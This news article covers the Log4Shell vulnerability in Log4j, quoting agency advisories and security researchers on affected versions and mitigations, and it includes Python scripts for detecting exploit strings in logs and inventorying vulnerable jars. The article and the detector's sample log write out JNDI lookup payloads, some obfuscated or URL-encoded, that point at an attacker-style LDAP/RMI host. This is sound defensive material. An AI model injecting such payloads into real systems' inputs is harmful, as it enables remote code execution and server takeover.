A serious code execution vulnerability in Log4j has security experts warning of potentially catastrophic consequences for enterprise organizations and web apps.
The vulnerability, listed as CVE-2021-44228 in the Apache Log4j Security Vulnerabilities log, enables remote attackers to take control of an affected system.
What is Log4j?
Log4j is an open source logging library for Java, maintained by the Apache Software Foundation, that developers use to record events (errors, requests, diagnostic messages) from inside an application.
The vulnerability in this widely used library allows Remote Code Execution (RCE). An attacker places a specially crafted string, a JNDI lookup of the form ${jndi:ldap://attacker-host/a}, in any input the application logs, such as a username or an HTTP header. When Log4j formats the message it resolves the lookup, connects to the attacker's LDAP server, and loads and runs a Java class served from there, giving the attacker control of the server.
Wired reports that attackers were using Minecraft’s chat function to exploit the vulnerability Friday afternoon.
Who Is Impacted By The Log4j Security Issue?
The issue is so severe that the United States Cybersecurity & Infrastructure Security Agency released a notice December 10 that states, in part:
“CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.”
The Apache advisory referenced above classifies the severity of the issue as ‘Critical’ and describes it as:
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
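As an added example for this article (not code from Log4j or from anyone quoted on this page), the following Python script shows how a defender can hunt for that attacker-controlled lookup in logs already written. A plain search for ${jndi: misses the nested lookups attackers used (${${lower:j}ndi:...}, ${::-j} default values, URL-encoded payloads), so the script peels those layers off the way Log4j's own interpolator would before deciding. It re-implements only the lookup forms needed for that (lower:, upper:, and the :-default syntax) and treats every other lookup as opaque. The access-log lines it runs over are constructed for the example; the IP addresses are documentation ranges, not real hosts.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in log lines, including the
nested-lookup obfuscations used to evade naive "${jndi:" matching.
Added example for this article; not Log4j code."""
import re
from urllib.parse import unquote

# A lookup with no further lookup nested inside it (innermost first).
INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the nesting is peeled away.
JNDI = re.compile(r"jndi:|\$\{[^}]*(?:ldaps?|rmi|dns)://", re.IGNORECASE)


def resolve_one(body):
    """Evaluate one innermost lookup body; None means 'unknown, leave as-is'."""
    if ":-" in body:                       # ${::-j} or ${env:NOPE:-j} -> default value
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        name = name.lower()                # Log4j lookup names are case-insensitive
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return None                            # env:, sys:, jndi:, ... are left opaque


def deobfuscate(text, max_rounds=32):
    """Peel nested lookups from the inside out, as Log4j's interpolator would."""
    text = unquote(text)                   # payloads often arrive URL-encoded
    for _ in range(max_rounds):
        found = False

        def sub(m):
            nonlocal found
            found = True
            val = resolve_one(m.group(1))
            # Unknown lookups are re-wrapped in sentinels so they are not matched again.
            return val if val is not None else "\x00" + m.group(1) + "\x01"

        text = INNER.sub(sub, text)
        if not found:
            break
    return text.replace("\x00", "${").replace("\x01", "}")


def scan_lines(log_text):
    """One record per line: the resolved form plus 'lookup' and 'jndi' flags."""
    records = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        resolved = deobfuscate(line)
        records.append({
            "line": lineno,
            "resolved": resolved,
            "lookup": "${" in resolved,           # any lookup in user input is worth a look
            "jndi": bool(JNDI.search(resolved)),  # lookup that reaches out to attacker infra
        })
    return records


# Constructed sample access log (not real traffic); 198.51.100.7 is a documentation address.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.12 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"
203.0.113.13 - - [10/Dec/2021:14:02:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/a}"
203.0.113.14 - - [10/Dec/2021:14:02:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.15 - - [10/Dec/2021:14:02:41 +0000] "GET /price?amt=${env:HOME} HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for r in scan_lines(SAMPLE_LOG):
        if r["jndi"] or r["lookup"]:
            print(r["line"], "JNDI" if r["jndi"] else "lookup", r["resolved"])
```

The `lookup` flag is deliberately separate from `jndi`: an unresolved `${env:HOME}` in a query string is not an exploit attempt on its own, but it is someone probing whether your application interpolates what it logs, and is worth correlating with the same source address.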
Marcus Hutchins from MalwareTech.com warns that iCloud, Steam, and Minecraft have all been confirmed vulnerable:
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Free Wortley, CEO at LunaSec, wrote in a Dec 9 ‘RCE Zero-Day’ blog post that, “Anybody using Apache Struts is likely vulnerable.”
He also said, “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.”
CERT.at, the Austrian Computer Emergency Response Team, published a warning Friday that stated those impacted include:
“All Apache log4j versions from 2.0 up to and including 2.14.1 and all frameworks (e.g. Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.) that use these versions.
According to the security company LunaSec, the JDK versions 6u211, 7u201, 8u191, and 11.0.1 are not affected in the default configuration, as this does not allow a remote codebase to be loaded.
However, if the option com.sun.jndi.ldap.object.trustURLCodebase is set to true, an attack is still possible.”
Rob Joyce, Director of Cybersecurity with the NSA, tweeted Friday that, “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA.”
Security Expert Recommendations For Combating Log4j Vulnerabilities
Kevin Beaumont warns that even if you had upgraded to log4j-2.15.0-rc1, there was a bypass:
If you already upgraded code to use just released log4j-2.15.0-rc1, it’s still vulnerable – you now need to apply log4j-2.15.0-rc2 as there was a bypass. There is no stable release which fixes yet.
— Kevin Beaumont (@GossiTheDog) December 10, 2021
Marcus Hutchins from MalwareTech.com offers a workaround for those who can’t upgrade Log4j:
If you can’t upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Matthew Prince, co-founder and CEO of Cloudflare, announced Friday:
“We’ve made the determination that #Log4J is so bad we’re going to try and roll out at least some protection for all Cloudflare customers by default, even free customers who do not have our WAF. Working on how to do that safely now.”
Chris Wysopal, co-founder and CTO at Veracode, recommends upgrading to a minimum of Java 8:
The patched version of log4j 2.15.0 requires a minimum of Java 8. If you are on Java 7 you will need to upgrade to Java 8
When there is active exploitation and you need to patch fast it is beneficial if you have been updating your other dependencies over time.
— Chris Wysopal (@WeldPond) December 10, 2021
He also warns, “There may be only 5% of apps still on Java 7 but that is the long tail that will be exploited over the next months. Don’t have one of these in your org.”
Figuring out which applications in your organization use Log4j, including indirectly through frameworks such as Struts2, Solr, Druid, and Flink, should be treated as mission critical.
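To make that inventory repeatable, here is an added example (not from the article, Apache, or anyone quoted above) that walks a directory tree, finds log4j-core jars by the Maven naming convention log4j-core-<version>.jar (an assumption; jars renamed or shaded into a fat jar will be missed), and triages each against the rules this page states: 2.0 through 2.14.1 affected, 2.15.0-rc1 still bypassable, 2.15.0 patched. It adds two details the article does not mention but which Apache documents: log4j2.formatMsgNoLookups only exists from 2.10 onward, so setting it on an older version changes nothing, and removing org/apache/logging/log4j/core/lookup/JndiLookup.class from the jar is the fallback for versions that cannot be upgraded, so the script reports a jar with that class already gone as mitigated. The demo() function builds empty placeholder jars in a temporary directory, constructed for the example; they are not real Log4j binaries.

```python
"""Inventory log4j-core jars under a directory tree and triage each one against
CVE-2021-44228. Added example for this article, not Apache or Log4j code.
Assumes Maven-style jar names (log4j-core-<version>.jar)."""
import os
import re
import tempfile
import zipfile

# Affected range quoted from the Apache advisory: 2.0 up to and including 2.14.1.
LAST_AFFECTED = (2, 14, 1)
# formatMsgNoLookups only exists from 2.10 onward; older versions silently ignore it.
NOLOOKUPS_MIN = (2, 10, 0)
NOLOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?\.jar$")


def parse_version(filename):
    """(major, minor, patch, qualifier) from a log4j-core jar name, or None."""
    m = JAR_NAME.match(filename)
    if not m:
        return None
    major, minor, patch, qual = m.groups()
    return (int(major), int(minor), int(patch or 0), (qual or "").lower())


def triage(version, has_jndi_lookup=True, jvm_args=()):
    """Verdict for one jar given its version and the JVM args of the process using it."""
    major, minor, patch, qual = version
    base = (major, minor, patch)
    if major != 2:
        return "out-of-scope"             # Log4j 1.x is a different code base
    affected = base <= LAST_AFFECTED or (base == (2, 15, 0) and qual == "rc1")
    if not affected:
        return "patched"
    if not has_jndi_lookup:
        return "mitigated-class-removed"  # JndiLookup.class stripped from the jar
    if NOLOOKUPS_FLAG in jvm_args and base >= NOLOOKUPS_MIN:
        return "mitigated-nolookups"
    return "vulnerable"                   # includes < 2.10 with the flag set: ignored there


def scan(root, jvm_args=()):
    """Walk root and return {jar path: verdict} for every log4j-core jar found."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            version = parse_version(name)
            if version is None:
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as jar:
                    has_lookup = JNDI_LOOKUP_CLASS in jar.namelist()
            except zipfile.BadZipFile:
                findings[path] = "unreadable"
                continue
            findings[path] = triage(version, has_lookup, jvm_args)
    return findings


def demo():
    """Build a throwaway tree of constructed placeholder jars and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = {  # relative path -> entries to put in the (otherwise empty) jar
        "app1/lib/log4j-core-2.14.1.jar": [JNDI_LOOKUP_CLASS],
        "app2/lib/log4j-core-2.15.0-rc1.jar": [JNDI_LOOKUP_CLASS],
        "app3/lib/log4j-core-2.15.0.jar": [JNDI_LOOKUP_CLASS],
        "app4/lib/log4j-core-2.8.2.jar": [],          # class already deleted
        "app5/lib/log4j-core-2.0-beta9.jar": [JNDI_LOOKUP_CLASS],
        "app6/lib/log4j-1.2.17.jar": [],              # 1.x: not matched by JAR_NAME
    }
    for rel, entries in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            for entry in entries:
                jar.writestr(entry, b"")              # empty placeholder, not bytecode
    return {os.path.relpath(p, root).replace(os.sep, "/"): v
            for p, v in scan(root).items()}


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{verdict:24} {path}")
```

Run `scan("/opt")` (or wherever your applications live) with the JVM arguments of the process that loads each jar; the version rules encode what the page reports as of December 10, 2021, so update LAST_AFFECTED as Apache publishes later advisories.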
Featured image: Shutterstock/solarseven